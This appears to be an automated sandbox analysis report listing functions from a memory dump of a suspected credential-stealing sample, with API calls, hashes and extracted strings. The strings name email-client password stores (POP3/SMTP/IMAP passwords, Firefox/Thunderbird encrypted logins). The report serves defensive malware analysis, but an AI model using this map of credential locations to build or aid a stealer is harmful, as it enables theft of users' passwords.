                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00406C89
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00406C99
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2315226746-0
                                                                                                                                                                                                          • Opcode ID: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
                                                                                                                                                                                                          • Instruction ID: 8edcd2d2b4f986e571765b3eebb92d88a59871b3330cf63fe52768e208e874e1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23F0E93B5047186BD7102FA1BC4CE6BBB2CDB86F96B050039FA0AD6253DE755C0447B9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004033E2 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                          • API String ID: 3963849919-1658304561
                                                                                                                                                                                                          • Opcode ID: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                                                                                                                                                                                          • Instruction ID: 1b90a5eb0bf433dfd26fdc49de6d86aad9c02d214cf5b02dd481862667588e5e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF21F47180151C6EDB51EB11DD82FEE777C9B44705F4004ABBA09B1092DBBC6BC68E59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004016FC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                          • String ID: E$ E$ E
                                                                                                                                                                                                          • API String ID: 1865533344-1090515111
                                                                                                                                                                                                          • Opcode ID: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                                                                          • Instruction ID: 87a0be596659d04b7e64c8373dbe8b7d58709088cb568d7826d55e868489c559
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E115A74900209EFCF119F90C905AAE3BB1AF08312F00806AFC156B2A2C7799911DFAA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0044227B Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0044269A
                                                                                                                                                                                                          • _strncoll.MSVCRT ref: 004426AA
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00442726
                                                                                                                                                                                                          • atoi.MSVCRT ref: 00442737
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00442763
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                                                                                                                                                                                          • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                                          • API String ID: 1864335961-3210201812
                                                                                                                                                                                                          • Opcode ID: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                                                                          • Instruction ID: 53082eb74af2b51306e1b07bdc149dea26fd0daa9c3b29582cc647e8b6ddbc01
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90F112B080625CDBFB61CF54D9897DEBBB0EB01308F5881CAD4597B251C7B81A89CF99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0044315E Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                          • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                          • API String ID: 1714764973-479759155
                                                                                                                                                                                                          • Opcode ID: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                                                                          • Instruction ID: 5e0940cb4a553810ccd5eed58eee7b2aa7af7a3cc246567a3fd24b3687d2e464
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD9191B260C7049AF628BB329D43B9B33D8AF50719F10043FF95AB61C2EE6DB905465D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040E417 Relevance: 68.7, APIs: 25, Strings: 14, Instructions: 449COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E6BB
                                                                                                                                                                                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E70C
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E728
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,%@,000000FF,?,00000104,?,?,?,?,?,?,0040EC25,?,00000000), ref: 0040E73F
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040EC25,?), ref: 0040E75E
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E7C0
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E7D5
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E83A
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E850
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E866
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E87C
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E892
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E8A8
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E8C2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                          • String ID: $"$$$$$%@$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                          • API String ID: 3137614212-1813914204
                                                                                                                                                                                                          • Opcode ID: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                                          • Instruction ID: 60cbd65c12865ccb94f157c96bc1922d811664869268201cbad442dfa9876f55
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9228E218087DA9DDB31D6BC9C456CDBF646B16234F0803DAF1E8BB2D2D7344A46CB66
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040DA89 Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _strcmpi$strlen$_strncoll$atoimemset$memcpy
                                                                                                                                                                                                          • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                          • API String ID: 594115653-593045482
                                                                                                                                                                                                          • Opcode ID: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                                          • Instruction ID: 1e907043fac54bf2e371806c1eb24ba38ca233ac5dd260cadef0f6990961d541
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C71D832804204AEFF14ABA1DD02B9E77B5DF91329F21406FF545B21C1EB7D9A18D64C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040E070 Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 279COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                                            • Part of subcall function 004086A5: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                                            • Part of subcall function 004086A5: CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                                            • Part of subcall function 00408763: _mbsicmp.MSVCRT ref: 0040879D
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E123
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E138
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E19F
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1B5
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1CB
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1E1
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1F7
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E20A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E225
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E23C
                                                                                                                                                                                                            • Part of subcall function 00406582: memset.MSVCRT ref: 004065A3
                                                                                                                                                                                                            • Part of subcall function 00406582: memcmp.MSVCRT ref: 004065CD
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E29D
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E2B4
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E2CB
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E2E6
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E2FB
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E310
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E326
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E33F
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E358
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E374
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                          • String ID: C@$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                          • API String ID: 4171719235-3249434271
                                                                                                                                                                                                          • Opcode ID: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                                                                          • Instruction ID: 4eb083177fa9c3dcba641838e0e399a852ec85db15ddf69852980c8670b79128
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFA16672D04219AEDF10EBA1DC41ADE77BCAF44304F1044BFF645B7181DA38AA988F59
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040FD76 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0040FDA3
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040FDAF
                                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0040FDBE
                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0040FDCA
                                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0040FDD3
                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0040FDDF
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0040FDF1
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040FDFC
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE10
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE1E
                                                                                                                                                                                                          • GetDC.USER32 ref: 0040FE57
                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040FE97
                                                                                                                                                                                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040FEA8
                                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 0040FEF5
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040FFB5
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 0040FFC9
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 0040FFE7
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 0041001D
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041002D
                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041003B
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00410052
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041005C
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 004100A2
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004100AC
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 004100E4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                          • API String ID: 1703216249-3046471546
                                                                                                                                                                                                          • Opcode ID: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
                                                                                                                                                                                                          • Instruction ID: 60093129ffb9b10d71bc98ba01756b195f92c815bd96d79b3314cc8c80e42073
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62B1DE71108741AFDB20DF68C985E6BBBE9FF88704F00492EF69992261DB75E804CF56
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040243C Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004024E7
                                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402525
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004025EF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                          • API String ID: 168965057-606283353
                                                                                                                                                                                                          • Opcode ID: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                                                                                                                                                                                          • Instruction ID: 01ace8319ffdb9fe87aab8cc910760b0be55d28e69d7af66dfccc1b3ad16f9ad
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 815163B540161CEBEF20DF91DC85ADD7BACAF04318F50846BFA08A6142D7BD9584CF98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004027B0 Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040285B
                                                                                                                                                                                                            • Part of subcall function 00402994: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029C5
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402895
                                                                                                                                                                                                            • Part of subcall function 00402994: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029F3
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040296D
                                                                                                                                                                                                            • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                          • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                          • API String ID: 1497257669-167382505
                                                                                                                                                                                                          • Opcode ID: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                                                                                                                                                                                          • Instruction ID: 24fe9e335227be75b4da69fc4be99485a809f42695e36ab36f90f83f1315ab2f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22514DB150060C9BEF25EF61DC85ADD7BA8FF04308F50802BF924661A2DBB99958CF48
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040F5B8 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040F600
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0040F618
                                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F637
                                                                                                                                                                                                          • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040F644
                                                                                                                                                                                                          • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040F64D
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F675
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F695
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6B3
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6CC
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6EA
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F703
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0040F70B
                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F730
                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F766
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F7BD
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0040F7CB
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040F7FA
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040F81C
                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040F887
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040F8A0
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0040F8AA
                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 0040F8B1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040F881
                                                                                                                                                                                                          • {Unknown}, xrefs: 0040F67A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                          • API String ID: 1428123949-3474136107
                                                                                                                                                                                                          • Opcode ID: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                                                                          • Instruction ID: eaf6f4841f79e9ca67ab0c8a61f7093b44a411cbafad24e33deb6097971d8b5c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9341adbc2cd016ad37feae7563ea95aa4c33f034ac246c3141dbd5b744c5ef9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4271B576404344BFEB31ABA0DC41EDB7B9CFB94345F00443AF644A25A1DB399D18CB6A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
